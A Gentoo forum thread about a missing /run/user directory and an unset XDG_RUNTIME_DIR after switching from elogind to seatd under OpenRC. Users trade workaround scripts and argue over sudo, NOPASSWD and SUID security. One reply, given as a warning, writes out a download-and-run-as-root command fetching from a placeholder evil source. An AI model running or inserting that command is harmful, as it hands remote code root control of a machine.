View previous topic :: View next topic |
Author |
Message |
guyuming Apprentice
Joined: 19 Nov 2020 Posts: 249
|
Posted: Wed May 03, 2023 1:29 pm Post subject: no /run/user folder, switching from openrc elogind to seatd |
|
|
i used to use openrc + elogind on my laptop.
i am trying seatd instead of elogind today.
I removed elogind USE flag from make.conf, re-emerged and started seatd according to https://wiki.gentoo.org/wiki/Seatd
but i get XDG_RUNTIME_DIR not set error when i start wayland compositor.
according to https://forums.gentoo.org/viewtopic-p-8755871.html, i need to export XDG_RUNTIME_DIR=/run/user/${id -u}
But i don't have user folder under /run.
What shall i do? create /run/user manually? what permission to set on it? |
|
Back to top |
|
|
GDH-gentoo Veteran
Joined: 20 Jul 2019 Posts: 1779 Location: South America
|
Posted: Wed May 03, 2023 3:18 pm Post subject: |
|
|
Have a look at this (from seatd's author). _________________
NeddySeagoon wrote: | I'm not a witch, I'm a retired electronics engineer |
Ionen wrote: | As a packager I just don't want things to get messier with weird build systems and multiple toolchains requirements though |
|
|
Back to top |
|
|
guyuming Apprentice
Joined: 19 Nov 2020 Posts: 249
|
Posted: Wed May 03, 2023 11:11 pm Post subject: |
|
|
@GDH-gentoo, thanks! the scripts works for me and i can start my DWL wayland compositor with seatd now
UPDATE: i thought it worked. but after restarting the computer, it fails again.
when i first tried the script, i added it into /etc/profile, or ~/.profile. And in a tty, sudo su and then source /etc/profile to run the script. And then i can start wayland compositor after exit sudo.
But after restarting computer, the /run/user folder disappears, and the script don't have permission to create it, i think i have to sudo to gain the permission. But how can i do it automatically when login.
I tried the PAM_RUNDIR.so, adding it into /etc/pam.d/system-login, But i did not see /run/user created.
I am using openrc, how to check whether pam modules are called?
the s-toolbox solution link need authentication and i don't have access to it |
|
Back to top |
|
|
Jimmy Jazz Guru
Joined: 04 Oct 2004 Posts: 333 Location: Strasbourg
|
Posted: Thu May 04, 2023 12:26 pm Post subject: |
|
|
As you I'm using seatd with XDG_RUNTIME_DIR=/home/user/tmp under Xorg but not with wayland. I don't have a /run at all. So /run/user is not mandatory. _________________ « La seule condition au triomphe du mal, c'est l'inaction des gens de bien » E.Burke
Code: |
+----+----+----+
| |::::| |
| |::::| |
+----+----+----+ |
motto: WeLCRO
WritE Less Code, Repeat Often |
|
Back to top |
|
|
guyuming Apprentice
Joined: 19 Nov 2020 Posts: 249
|
Posted: Mon May 08, 2023 2:19 am Post subject: |
|
|
i just added sudo in front of the command, and add this ~/xdg_run_user script into the script i launch the wayland compositor with. It's ok now, just that i need to input password for sudo every time i start wayland compositor from tty.
guyuming@localhost ~/personal/gentoo $ cat ~/xdg_run_user
# Configuration because seatd does not do this for wayland compositor
YOUR_USER=$(id -u)
YOUR_GROUP=$(id -g)
XDG_RUNTIME_DIR=/run/user/$YOUR_USER
## Delete existing directory, create a new one and set permissions
sudo rm -rf $XDG_RUNTIME_DIR
sudo mkdir -p $XDG_RUNTIME_DIR
sudo chown $YOUR_USER:$YOUR_GROUP $XDG_RUNTIME_DIR
sudo chmod 700 $XDG_RUNTIME_DIR |
|
Back to top |
|
|
franzf Advocate
Joined: 29 Mar 2005 Posts: 4565
|
Posted: Mon May 08, 2023 6:14 am Post subject: |
|
|
guyuming wrote: | It's ok now, just that i need to input password for sudo every time i start wayland compositor from tty.
|
You can configure sudo to allow a user to run certain commands without having to enter a password.
Via NOPASSWD in sudoers config. |
|
Back to top |
|
|
sMueggli Guru
Joined: 03 Sep 2022 Posts: 516
|
Posted: Mon May 08, 2023 9:15 am Post subject: |
|
|
franzf wrote: | guyuming wrote: | It's ok now, just that i need to input password for sudo every time i start wayland compositor from tty.
|
You can configure sudo to allow a user to run certain commands without having to enter a password.
Via NOPASSWD in sudoers config. |
From a security point of view, you will make a bad situation even worse. The bad situation is, that you have a file that is writeable for the normal, unprivileged user. An attacker can therefore write his own code into the file, e.g.
Code: | wget -q -O - "$some_evil_source" | sudo bash |
Currently the attacker needs to wait until the user is entering the password during system startup. If you allow certain commands to execute without password, you will give an attacker probably the possibility to get immediately priviledged access to the system.
Therefore I highly recommend to follow the guide https://git.sr.ht/~kennylevinsen/seatd-docs/tree/master/item/index.md#xdg_runtime_dir-not-set and use a script that is owned by "root:root" and writeable only for root. This script should be executed at startup before you login (OpenRC or SystemD). |
|
Back to top |
|
|
Hu Administrator
Joined: 06 Mar 2007 Posts: 22954
|
Posted: Mon May 08, 2023 2:58 pm Post subject: |
|
|
Recreating the directory could be done at boot via systemd-tmpfiles, but this seems like something that should be handled by the login session tracker. |
|
Back to top |
|
|
Anon-E-moose Watchman
Joined: 23 May 2008 Posts: 6188 Location: Dallas area
|
Posted: Mon May 08, 2023 4:25 pm Post subject: |
|
|
On my system, openrc I just create the directory in /tmp.
Code: | export XDG_RUNTIME_DIR=/tmp/.runtime-${USER}
if [[ ! -e $XDG_RUNTIME_DIR ]]
then
mkdir -p "${XDG_RUNTIME_DIR}"
chmod 0700 "${XDG_RUNTIME_DIR}"
fi |
_________________ UM780, 6.12 zen kernel, gcc 13, openrc, wayland |
|
Back to top |
|
|
guyuming Apprentice
Joined: 19 Nov 2020 Posts: 249
|
Posted: Wed May 10, 2023 8:41 pm Post subject: |
|
|
thanks all!
@sMueggli, my script file to start wayland compositor permission is like follows, only i have write permission to this file, how can any other normal user inject script into it?
Code: |
guyuming@localhost ~/rfm $ ls -l ~/dwl.sh
-rwxr-xr-x 1 guyuming guyuming 351 May 5 11:00 /home/guyuming/dwl.sh
|
For openrc to run the script as root to create user folder, i did some web search: my understanding is that i should create a so-called openrc service file to wrap the script inside with. I am not so familiar with the openrc service file format. Are there any way for openrc to run script directly? |
|
Back to top |
|
|
sMueggli Guru
Joined: 03 Sep 2022 Posts: 516
|
Posted: Thu May 11, 2023 7:00 am Post subject: |
|
|
guyuming wrote: |
@sMueggli, my script file to start wayland compositor permission is like follows, only i have write permission to this file, how can any other normal user inject script into it?
|
The attacker only needs one exploitable vulnerability to open a shell, a reverse shell or exploit a remote code execution vulnerability. Every program that you are using is a possible entry point (e.g. Firefox).
To do it with systemd-tmpfiles should be easy (except studying the manuals). |
|
Back to top |
|
|
guyuming Apprentice
Joined: 19 Nov 2020 Posts: 249
|
Posted: Thu May 18, 2023 2:08 am Post subject: |
|
|
@sMueggli
but i seldom(if not never) run firefox with sudo, if some bad guy can control my firefox remotely, how can he use firefox to break the local file permission system to do something that need root? |
|
Back to top |
|
|
sMueggli Guru
Joined: 03 Sep 2022 Posts: 516
|
Posted: Thu May 18, 2023 9:37 am Post subject: |
|
|
guyuming wrote: | @sMueggli
but i seldom(if not never) run firefox with sudo, if some bad guy can control my firefox remotely, how can he use firefox to break the local file permission system to do something that need root? |
Firefox is running with the normal user privileges. And the file xdg_run_user is owned by the normal user and has the write permission for the normal user. So the attacker is able to inject "malicious" code into the file. The attacker then just needs to wait until you execute the script (and enter the password). |
|
Back to top |
|
|
guyuming Apprentice
Joined: 19 Nov 2020 Posts: 249
|
Posted: Sat May 27, 2023 7:12 am Post subject: |
|
|
@sMueggli, thanks,
according to your logic, any script own by my normal user account is not safe if it contains sudo, not just the script to start wayland compositor.
what if i change the owner of the scripts (dwl.sh, the script i use to start wayland compositor, and the script xdg_run_user) to root? and give my normal user only execute permission to these scripts, will this be much safer? |
|
Back to top |
|
|
guyuming Apprentice
Joined: 19 Nov 2020 Posts: 249
|
Posted: Sat May 27, 2023 7:34 am Post subject: |
|
|
@sMueggli,
I am also thinking of use SUID permission for the scripts that need to run with sudo, so i don't need to enter password anymore.
but i see talks on the web that says SUID is not safe, they recommend to use password-less sudo instead, that is, to add something as follows into /etc/sudoers, why?
Code: | normal_user ALL=(ALL) NOPASSWD:/usr/local/bin/sleep.sh |
|
|
Back to top |
|
|
sMueggli Guru
Joined: 03 Sep 2022 Posts: 516
|
Posted: Wed May 31, 2023 8:53 am Post subject: |
|
|
guyuming wrote: |
according to your logic, any script own by my normal user account is not safe if it contains sudo, not just the script to start wayland compositor.
|
Basically yes, unless you are checking every script that contains sudo prior to execute it.
guyuming wrote: |
what if i change the owner of the scripts (dwl.sh, the script i use to start wayland compositor, and the script xdg_run_user) to root? and give my normal user only execute permission to these scripts, will this be much safer? |
Setting up the runtime directory is something that the "root" user can do before you log in. Therefore I suggest to put the script in a place, where it belongs to root e.g. somewhere under /etc.
I do not know the dwl.sh script, so I cannot and do not want to make any recommendation. I am using Sway and I do not need any elevated privileges to start Sway.
I do not recommend the use of SUID for "private" stuff. SUID makes sense for certain binaries such as /usr/bin/passwd, but I would not use it, if there are other possibilities. |
|
Back to top |
|
|
Acatorn n00b
Joined: 12 Jan 2020 Posts: 7 Location: Faerûn
|
Posted: Sat Jan 04, 2025 10:23 pm Post subject: |
|
|
Jimmy Jazz wrote: | As you I'm using seatd with XDG_RUNTIME_DIR=/home/user/tmp under Xorg but not with wayland. I don't have a /run at all. So /run/user is not mandatory. |
I'm really, really sorry for necroposting here, but I'm very interested in this one.
Jimmy Jazz,
How did you ran Xorg using seatd? Did you use it combined with elogind? Is Xorg running as root in that setup?
Last few days I tried to run rootless Xorg (-suid) with seatd (with only these two USE flags enabled: +builtin +server) and greetd with tuigreeter and I couldn't get it to work. Standard Xorg error - parse_vt_settings cannot open /dev/tty0 permission - when I try to login.
It seems that seatd support is not implemented in upstream xorg-server (which is in official Gentoo repo) so there is no chance at all that would work. The only xorg-server patched for seatd support I found is in Devuan repo:
https://git.devuan.org/devuan/xorg-server
And heres the link for initial patch that enables seatd support in Devuan's xorg-server:
https://git.devuan.org/devuan/xorg-server/src/branch/suites/experimental/debian/patches/0001-Support-libseat.patch
Did you used that? _________________ Take heart fellow adventurers, for you have curried the favor of Boo, the only miniature giant space hamster in the Realm!
~ Minsc, the Berserker |
|
Back to top |
|
|
|